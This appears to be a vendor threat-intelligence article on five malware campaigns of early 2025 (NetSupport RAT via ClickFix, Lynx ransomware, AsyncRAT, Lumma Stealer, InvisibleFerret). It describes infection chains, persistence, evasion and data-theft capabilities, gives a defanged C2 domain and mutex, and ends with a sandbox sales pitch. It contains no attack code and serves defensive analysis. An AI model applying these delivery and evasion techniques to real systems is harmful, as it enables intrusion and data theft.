The first quarter of 2025 has been a battlefield in the world of cybersecurity. Cybercriminals continued launching aggressive new campaigns and refining their attack methods.
Below is an overview of five notable malware families, accompanied by analyses conducted in controlled environments.
NetSupport RAT Exploiting the ClickFix Technique
In early 2025, threat actors began exploiting a technique known as ClickFix to distribute the NetSupport Remote Access Trojan (RAT).
This method involves injecting fake CAPTCHA pages into compromised websites, prompting users to execute malicious PowerShell commands that download and run the NetSupport RAT.
Once installed, this RAT grants attackers full control over the victim’s system, allowing activities such as real-time screen monitoring, file manipulation, and execution of arbitrary commands.
Main technical characteristics of NetSupport RAT
- Attackers can view and control the victim’s screen in real time.
- Uploads, downloads, modifies, and deletes files on the infected system.
- Runs system commands and PowerShell scripts remotely.
- Captures copied text, including passwords and sensitive data.
- Records user keystrokes for credential theft.
- Starts, stops, and modifies system processes and services.
- Installs itself in startup folders, registry keys, or scheduled tasks to survive reboots.
- Uses process injection and code obfuscation to evade detection.
- Maintains a stealthy connection with attackers using encrypted traffic.
After running the NetSupport RAT payload inside ANY.RUN’s Interactive Sandbox, we can see several activities.
View NetSupport RAT analysis session
 |
| Malicious archive opened inside ANY.RUN sandbox |
When NetSupport RAT infects a system, it immediately establishes a connection with a command-and-control (C2) server, allowing attackers to operate the compromised machine remotely.
 |
| CnC connection detected by ANY.RUN sandbox |
Through this connection, attackers can execute system commands, deploy additional malware, and modify system settings.
Equip your team with ANY.RUN’s Interactive Sandbox to analyze unlimited malware in real time, uncover threats faster, and strengthen your defenses.
NetSupport RAT employs multiple Tactics, Techniques, and Procedures (TTPs) to maintain persistence, evade detection, and gather system data. Key TTPs include:
- Persistence & Execution: Modifies registry startup keys, executes scripts via wscript.exe.
- Discovery: Reads computer name, checks system language, and accesses environment variables.
- Defense Evasion & C2 Communication: Drops legitimate Windows executables, creates internet connection objects for remote control.
These techniques demonstrate how NetSupport RAT establishes control while avoiding detection, all of which are visible in ANY.RUN’s ATT&CK mapping.
 |
| Main TTPs used by NetSupport RAT |
Lynx Ransomware
The Lynx Ransomware-as-a-Service (RaaS) group is known as a highly organized entity, offering a structured affiliate program and robust encryption methods. Building upon the foundation of the earlier INC ransomware, Lynx has enhanced its capabilities and expanded its reach, targeting a diverse range of industries across multiple countries.
Lynx’s affiliate panel allows its affiliates to configure victim profiles, generate custom ransomware samples, and manage data-leak schedules within a user-friendly interface. Because of its structured approach, it becomes one of the most accessible ransomware even for those with limited technical expertise.
To incentivize participation, Lynx offers affiliates an 80% share of ransom proceeds. The group maintains a leak site where stolen data is published if victims fail to pay the ransom.
Major attacks of Lynx in Q1
In the first quarter of 2025, the Lynx Ransomware-as-a-Service (RaaS) group has intensified its operations, targeting various industries with sophisticated attacks.
Particularly, in February 2025, Lynx claimed responsibility for breaching Brown and Hurley, a prominent Australian truck dealership. The group alleged the theft of approximately 170 gigabytes of sensitive data, including human resources documents, business contracts, customer information, and financial records.
In January 2025, Lynx also breached Hunter Taubman Fischer & Li LLC, a U.S.-based law firm specializing in corporate and securities law.
Main technical characteristics of Lynx ransomware
- Encrypts all files by default, including local drives, network shares, and removable media.
- Configurable via RaaS to target specific file types, folders, or extensions.
- Steals sensitive data before encryption, exfiltrating documents, credentials, and financial information.
- Transfers stolen data over encrypted channels, such as HTTPS or custom communication protocols.
- Deletes Volume Shadow Copies and disables Windows recovery features to prevent restoration.
- Closes applications that may block encryption using RestartManager.
- Utilizes credential dumping techniques to extract stored passwords from browsers, Windows Credential Manager, and networked devices.
- Maintains a C2 connection with DGA-based domains and anonymized traffic via Tor.
- Detects VMs and sandboxes, altering behavior to evade analysis.
- Runs in memory without writing files to disk, avoiding detection.
We can observe Lynx Ransomware’s behavior firsthand in a controlled environment. In the ANY.RUN sandbox analysis, after executing the Lynx payload, the infected system undergoes several noticeable changes.
View Lynx ransomware analysis session
 |
| Desktop background changed inside ANY.RUN sandbox |
The desktop background is replaced with a ransom message, and the attackers leave a note warning that all data has been stolen and encrypted. Victims are instructed to download Tor to contact them.
 |
| Ransomware message left by attackers |
The sandbox also detects how Lynx systematically renames files, appending its extension. For example, C:\Users\admin\Desktop\academicroad.rtf becomes C:\Users\admin\Desktop\academicroad.rtf.LYNX.
 |
| Files renaming with .lynx detected by ANY.RUN |
Dozens of files across the system are modified this way, further confirming its encryption process. These are just a few of the many destructive actions Lynx carries out once inside a compromised system.
 |
| Modification of files by Lynx ransomware |
AsyncRAT: Leveraging Python Payloads and TryCloudflare Tunnels
In early 2025, cybersecurity researchers uncovered a sophisticated malware campaign deploying AsyncRAT, a remote access trojan known for its efficient, asynchronous communication capabilities.
This campaign stands out due to its use of Python-based payloads and the exploitation of TryCloudflare tunnels to enhance stealth and persistence.
Infection Chain Overview
The attack initiates with a phishing email containing a Dropbox URL. When recipients click the link, they download a ZIP archive housing an internet shortcut (URL) file.
This file, in turn, retrieves a Windows shortcut (LNK) file via a TryCloudflare URL. Executing the LNK file triggers a series of scripts, PowerShell, JavaScript, and batch scripts, that download and execute a Python payload.
This payload is responsible for deploying multiple malware families, including AsyncRAT, Venom RAT, and XWorm.
Technical Characteristics of AsyncRAT
- Allows attackers to execute commands, monitor user activity, and manage files on the compromised system.
- Capable of stealing sensitive information, including credentials and personal data.
- Employs techniques to maintain long-term access, such as modifying system registries and utilizing startup folders.
- Uses obfuscation and encryption to evade detection by security solutions.
Inside ANY.RUN’s analysis session, we can open the MalConf section to reveal the malicious configurations used by AsyncRAT.
View AsyncRAT analysis session
 |
| Malicious configurations analyzed inside controlled environment |
As we can see, AsyncRAT connects to masterpoldo02[.]kozow[.]com over port 7575, allowing remote attackers to control infected machines. Blocking this domain and monitoring traffic to this port can help prevent infections.
Besides, AsyncRAT installs itself in %AppData% to blend in with legitimate applications and uses a mutex (AsyncMutex_alosh) to prevent multiple instances from running.
The malware also uses AES encryption with a hardcoded key and salt, making it difficult for security tools to analyze its communications.
 |
| AES encryption used by AsyncRAT |
Lumma Stealer: GitHub-Based Distribution
In early 2025, cybersecurity experts uncovered a sophisticated campaign involving Lumma Stealer, an information-stealing malware.
Attackers used GitHub’s release infrastructure to distribute this malware, exploiting the platform’s trustworthiness to bypass security measures.
Once executed, Lumma Stealer initiates additional malicious activities, including downloading and running other threats like SectopRAT, Vidar, Cobeacon, and additional Lumma Stealer variants.
Technical Characteristics of Lumma Stealer
- Distributed through GitHub releases, leveraging trusted infrastructure to evade security detection.
- Steals browser credentials, cookies, cryptocurrency wallets, and system information.
- Sends stolen data to remote servers, enabling real-time exfiltration.
- Can download and execute additional malware, including SectopRAT, Vidar, and Cobeacon.
- Uses registry modifications and startup entries to maintain access.
- Detectable through network-based security monitoring tools, revealing malicious communication patterns.
 |
| Lumma Stealer analyzed inside ANY.RUN virtual machine |
A detailed examination using the ANY.RUN sandbox demonstrates Lumma Stealer’s behavior.
Upon execution, the malware connects to its command-and-control server, facilitating the exfiltration of sensitive data. The analysis also reveals the triggering of specific Suricata rules:
 |
| Suricata rule triggered by Lumma Stealer |
The analysis session also reveals how Lumma steals credentials from web browsers and exfiltrates personal data:
 |
| Credentials and personal data theft by Lumma Stealer |
InvisibleFerret: The Silent Threat Lurking in Fake Job Offers
In a wave of social engineering attacks, cybercriminals have been leveraging InvisibleFerret, a stealthy Python-based malware, to compromise unsuspecting victims.
Disguised as legitimate software in fake job interview processes, this malware has been actively used in the fake interview campaign, where attackers pose as recruiters to trick professionals into downloading malicious tools.
Technical Characteristics of InvisibleFerret
- The malware employs disorganized and obfuscated Python scripts, making analysis and detection challenging.
- InvisibleFerret actively searches for and exfiltrates sensitive information, including source code, cryptocurrency wallets, and personal files.
- Often delivered as a secondary payload by another malware called BeaverTail, which is an obfuscated JavaScript-based infostealer and loader.
- The malware establishes persistence on the infected system, ensuring continued access and control.
A key element of the InvisibleFerret attack is the deployment of BeaverTail, a malicious NPM module that delivers a portable Python environment (p.zip) to execute the malware.
Acting as the first stage in a multi-layered attack chain, BeaverTail sets up InvisibleFerret, a stealthy backdoor with advanced obfuscation and persistence mechanisms, making detection difficult.
By submitting InvisibleFerret to ANY.RUN’s Interactive Sandbox, we can analyze its behavior in real time:
View InvisibleFerret analysis session
 |
| InvisibleFerret behavior analyzed by ANY.RUN sandbox |
The malware starts by collecting system information, such as OS version, hostname, username, and geolocation, using services like ip-api.com, a method also used by cryptocurrency drainers.
 |
| Exfiltrated information analyzed inside ANY.RUN sandbox |
Malicious requests blend with normal traffic, making detection challenging. ANY.RUN’s interface highlights these activities, showing network requests in orange and red beneath the virtual machine.
 |
| Malicious requests are blended with legitimate traffic, all directed by the same script |
Clicking on the ATT&CK button in ANY.RUN’s sandbox provides a breakdown of InvisibleFerret’s TTPs. One key detection is T1016 (“System Network Configuration Discovery”), which highlights how the malware gathers geolocation and system data.
 |
| Main TTPs used by InvisibleFerret |
Don’t Let Threats Go Unnoticed – Detect Them with ANY.RUN
The first quarter of 2025 has been filled with stealthy and aggressive cyber threats, from ransomware operations to silent data stealers. But attackers don’t have to win.
ANY.RUN’s Interactive Sandbox gives businesses the power to analyze malware in real time, uncover hidden behaviors, and strengthen defenses before an attack escalates.
With ANY.RUN, security teams can:
- Gather IOCs instantly to speed up threat hunting and incident response.
- Get structured, in-depth reports for better visibility into malware behavior.
- Map threats to the ATT&CK framework to understand tactics and techniques used by attackers.
- Collaborate seamlessly, sharing real-time analysis across teams.
Sign up for a free ANY.RUN trial today and experience it for yourself!
https://thehackernews.com/2025/02/5-active-malware-campaigns-in-q1-2025.html
